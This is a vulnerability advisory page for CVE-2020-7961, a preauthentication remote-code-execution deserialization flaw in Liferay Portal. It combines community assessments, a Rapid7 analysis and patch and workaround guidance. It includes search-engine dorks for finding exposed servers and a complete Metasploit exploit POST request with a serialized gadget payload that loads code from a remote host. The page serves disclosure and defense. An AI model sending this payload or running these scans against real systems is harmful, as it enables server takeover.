Attacker Value
Very High
(4 users assessed)
Exploitability
Very High
(4 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
5

CVE-2020-7961

Disclosure Date: March 20, 2020
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).

Add Assessment

3
Technical Analysis

A Metasploit module has been written: https://github.com/rapid7/metasploit-framework/pull/13213.

ETA: Please see the Rapid7 analysis. CVE-2020-7961 is being used in the “FreakOut” attack campaign.

3
Ratings
Technical Analysis

Google dork:- inurl:/api/jsonws

Shodan:- Powered+By+Liferay

publicwww:-https://publicwww.com/websites/Powered+By+Liferay/

POC:-
https://github.com/mzer0one/CVE-2020-7961-POC

3
Ratings
Technical Analysis

quick assessment to add references:
good write up the vulnerability https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
working PoC https://github.com/mzer0one/CVE-2020-7961-POC

there is not so much to add here because synacktiv already explained what’s interesting: a preauth RCE on a commonly used in enterprise and internet faced framework. a framework NOT updated on regularly basis.

plus, based on my very own experience, liferay/tomcat on windows let you mostly land as SYSTEM. with an install base, according to shodan, of more than the half on windows, this is a very interesting vuln to exploit

2
Technical Analysis

This has now been reported as being exploited in the wild as part of the FreakOut attacks as first reported by CheckPoint Research at https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/.

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • liferay

Products

  • liferay portal

Exploited in the Wild

Reported by:
Technical Analysis

Description

Update January 19, 2021: Check Point Research released a blog post warning that the “FreakOut” attack campaign is utilizing CVE-2020-7961, as well as CVE-2020-28188 and CVE-2021-3007, to infect hosts with IRC botnet malware. Rapid7 urges customers to incorporate incident response into their remediation of CVE-2020-7961.

On November 25, 2019, Liferay released a security advisory for CVE-2020-7961, a Java deserialization vulnerability in Liferay Portal’s JSON Web Services (JSONWS). Exploitation of the vulnerability leads to unauthenticated remote code execution (RCE) in Liferay Portal versions 7.2.0 and earlier. Markus Wulftange of Code White is credited with the discovery of CVE-2020-7961.

On March 20, 2020, Code White released a technical writeup on the Liferay Portal vulnerabilities they discovered, notably detailing their discovery of CVE-2020-7961. Code White did not release a proof-of-concept (PoC) for CVE-2020-7961 but did prove they had achieved RCE with it.

On March 30, 2020, Thomas Etrillard of Synactiv released an analysis of CVE-2020-7961 based on Code White’s research. Etrillard further documented the PoC commands necessary to exploit the vulnerability. A Metasploit module exists for CVE-2020-7961.

Affected products

Liferay Portal 7.2.0 and earlier.

Rapid7 analysis

CVE-2020-7961 is exploitable by sending a single HTTP POST request to the /api/jsonws/expandocolumn/update-column endpoint, as seen in the following example Metasploit request.

POST /api/jsonws/expandocolumn/update-column HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1338

columnId=12&name=12&type=37&%2bdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource&defaultData.userOverridesAsString=HexAsciiSerializedMap%3aaced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400174a767469616c7462616d6e6676626264726c7a70667869740016687474703a2f2f3132372e302e302e313a383038322f7400174a767469616c7462616d6e6676626264726c7a70667869%3b

The Java deserialization attack can be seen in the request’s defaultData.userOverridesAsString parameter.

wvu@kharak:~$ xxd -r -p <<<aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400174a767469616c7462616d6e6676626264726c7a70667869740016687474703a2f2f3132372e302e302e313a383038322f7400174a767469616c7462616d6e6676626264726c7a70667869 | tee >(file -) >(xxd) > /dev/null
00000000: aced 0005 7372 003d 636f 6d2e 6d63 6861  ....sr.=com.mcha
00000010: 6e67 652e 7632 2e6e 616d 696e 672e 5265  nge.v2.naming.Re
00000020: 6665 7265 6e63 6549 6e64 6972 6563 746f  ferenceIndirecto
00000030: 7224 5265 6665 7265 6e63 6553 6572 6961  r$ReferenceSeria
00000040: 6c69 7a65 6462 1985 d0d1 2ac2 1302 0004  lizedb....*.....
00000050: 4c00 0b63 6f6e 7465 7874 4e61 6d65 7400  L..contextNamet.
00000060: 134c 6a61 7661 782f 6e61 6d69 6e67 2f4e  .Ljavax/naming/N
00000070: 616d 653b 4c00 0365 6e76 7400 154c 6a61  ame;L..envt..Lja
00000080: 7661 2f75 7469 6c2f 4861 7368 7461 626c  va/util/Hashtabl
00000090: 653b 4c00 046e 616d 6571 007e 0001 4c00  e;L..nameq.~..L.
000000a0: 0972 6566 6572 656e 6365 7400 184c 6a61  .referencet..Lja
000000b0: 7661 782f 6e61 6d69 6e67 2f52 6566 6572  vax/naming/Refer
000000c0: 656e 6365 3b78 7070 7070 7372 0016 6a61  ence;xppppsr..ja
000000d0: 7661 782e 6e61 6d69 6e67 2e52 6566 6572  vax.naming.Refer
000000e0: 656e 6365 e8c6 9ea2 a8e9 8d09 0200 044c  ence...........L
000000f0: 0005 6164 6472 7374 0012 4c6a 6176 612f  ..addrst..Ljava/
00000100: 7574 696c 2f56 6563 746f 723b 4c00 0c63  util/Vector;L..c
00000110: 6c61 7373 4661 6374 6f72 7974 0012 4c6a  lassFactoryt..Lj
00000120: 6176 612f 6c61 6e67 2f53 7472 696e 673b  ava/lang/String;
00000130: 4c00 1463 6c61 7373 4661 6374 6f72 794c  L..classFactoryL
00000140: 6f63 6174 696f 6e71 007e 0007 4c00 0963  ocationq.~..L..c
00000150: 6c61 7373 4e61 6d65 7100 7e00 0778 7073  lassNameq.~..xps
00000160: 7200 106a 6176 612e 7574 696c 2e56 6563  r..java.util.Vec
00000170: 746f 72d9 977d 5b80 3baf 0103 0003 4900  tor..}[.;.....I.
00000180: 1163 6170 6163 6974 7949 6e63 7265 6d65  .capacityIncreme
00000190: 6e74 4900 0c65 6c65 6d65 6e74 436f 756e  ntI..elementCoun
000001a0: 745b 000b 656c 656d 656e 7444 6174 6174  t[..elementDatat
000001b0: 0013 5b4c 6a61 7661 2f6c 616e 672f 4f62  ..[Ljava/lang/Ob
000001c0: 6a65 6374 3b78 7000 0000 0000 0000 0075  ject;xp........u
000001d0: 7200 135b 4c6a 6176 612e 6c61 6e67 2e4f  r..[Ljava.lang.O
000001e0: 626a 6563 743b 90ce 589f 1073 296c 0200  bject;..X..s)l..
000001f0: 0078 7000 0000 0a70 7070 7070 7070 7070  .xp....ppppppppp
00000200: 7078 7400 174a 7674 6961 6c74 6261 6d6e  pxt..Jvtialtbamn
00000210: 6676 6262 6472 6c7a 7066 7869 7400 1668  fvbbdrlzpfxit..h
00000220: 7474 703a 2f2f 3132 372e 302e 302e 313a  ttp://127.0.0.1:
00000230: 3830 3832 2f74 0017 4a76 7469 616c 7462  8082/t..Jvtialtb
00000240: 616d 6e66 7662 6264 726c 7a70 6678 69    amnfvbbdrlzpfxi
/dev/stdin: Java serialization data, version 5
wvu@kharak:~$

Guidance

Rapid7 recommends that Liferay Portal customers apply the appropriate patch or workaround in this document. The patch and workaround information is reproduced below.

Patches

Liferay Portal 7.2: There is no patch available for Liferay Portal 7.2.0. Instead, users should upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later.

Liferay Portal 7.1: Source patch for Liferay Portal 7.1 GA4 (7.1.3) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.

Liferay Portal 7.0: Source patch for Liferay Portal 7.0 GA7 (7.0.6) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.

Liferay Portal 6.2: Source patch for Liferay Portal 6.2 GA6 (6.2.5) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.

Workaround

Disable JSONWS by setting the portal.property jsonws.servlet.hosts.allowed=Not/Available.

References